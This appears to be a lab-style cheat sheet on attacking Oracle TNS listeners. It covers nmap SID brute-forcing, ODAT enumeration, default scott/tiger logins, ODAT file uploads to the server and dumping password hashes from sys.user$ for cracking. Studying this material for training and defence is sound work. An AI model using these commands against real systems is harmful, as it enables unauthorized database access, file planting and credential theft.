Oracle TNS
Table of Contents
- Introduction to Oracle TNS
- Enumeration Techniques
- Advanced Techniques
- Exploitation Scenarios
- Combining Tools
- Glossary
Introduction to Oracle TNS
Overview
Oracle Transparent Network Substrate (TNS) is a protocol that facilitates communication between Oracle databases and client applications over networks.
Key Features:
- Purpose: Enables database connection management, name resolution, and security features like encryption and authentication.
- Uses: Widely deployed in industries like healthcare, finance, and retail.
Default Configuration
| Default Values | Description |
|---|---|
| Port: 1521 | Default TNS listener port. |
| Listener File: | listener.ora defines the listener behavior. |
| Service File: | tnsnames.ora resolves database service names. |
Example Listener File (listener.ora):
LISTENER =
(DESCRIPTION_LIST =
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = orcl.htb)(PORT = 1521))
)
)
Example Service File (tnsnames.ora):
ORCL =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = orcl)
)
)
Enumeration Techniques
Service Discovery with Nmap
Scan for TNS services and detect versions.
Command:
nmap -p1521 -sV TARGET_IP
Example Output:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0
SID Enumeration
Discover valid SIDs using Nmap or ODAT.
Using Nmap:
nmap -p1521 --script oracle-sid-brute TARGET_IP
Example Output:
| oracle-sid-brute:
|_ XE
Advanced Techniques
Using ODAT for Oracle Enumeration
ODAT (Oracle Database Attacking Tool) is an open-source Python-based tool for Oracle database enumeration.
Install:
git clone https://github.com/quentinhardy/odat.git
cd odat
pip3 install -r requirements.txt
Run All Modules:
python3 odat.py all -s TARGET_IP
SQLplus Interaction
After obtaining credentials, use sqlplus to interact with the database.
Login:
sqlplus scott/tiger@TARGET_IP/XE
Common Commands:
-
List all tables:
SELECT table_name FROM all_tables; -
Show user privileges:
SELECT * FROM user_role_privs;
Exploitation Scenarios
File Upload with ODAT
Use ODAT to upload files to the Oracle server.
Example:
python3 odat.py utlfile -s TARGET_IP -d XE -U scott -P tiger --putFile /local/path/to/file /remote/path/on/server
Validate Upload:
curl http://TARGET_IP/<uploaded_file>
Extracting Password Hashes
Dump user hashes for offline cracking.
SQL Command:
SELECT name, password FROM sys.user$;
Example Output:
NAME PASSWORD
SYS FBA343E7D6C8BC9D
OUTLN 4A3BA55E08595C81
Combining Tools
Nmap and ODAT
Discovery with Nmap:
nmap -p1521 -sV TARGET_IP
Enumeration with ODAT:
python3 odat.py sidguesser -s TARGET_IP
Automating Oracle Enumeration
Automate common tasks with scripts.
Bash Script Example:
#!/bin/bash
nmap -p1521 --script oracle-sid-brute $1
python3 odat.py all -s $1
Glossary
| Term | Definition |
|---|---|
| TNS | Oracle Transparent Network Substrate protocol. |
| SID | System Identifier for Oracle database instances. |
| ODAT | Oracle Database Attacking Tool. |
| Listener | Process that manages database connections. |
| SQLplus | Command-line interface for Oracle database management. |